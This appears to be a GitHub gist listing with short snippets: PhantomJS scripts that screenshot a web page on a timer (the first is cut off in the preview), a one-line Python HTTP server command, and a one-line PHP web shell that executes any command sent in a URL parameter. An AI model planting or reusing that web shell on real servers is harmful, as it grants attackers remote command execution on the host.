This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var page = require('webpage').create(); | |
page.viewportSize = { width: 640, height: 480 }; | |
page.open('<wep page>', function () { | |
setTimeout(function() { | |
// Initial frame | |
var frame = 0; | |
// Add an interval every 25th second | |
setInterval(function() { | |
// Render an image with the frame name |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var page = require('webpage').create(); | |
page.viewportSize = { width: 640, height: 480 }; | |
page.open('<web page>', function () { | |
setInterval(function() { | |
page.render('image.png', { format: "png" }); | |
}, 25); | |
}); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php system($_GET["cmd"]); ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python -m SimpleHTTPServer |
NewerOlder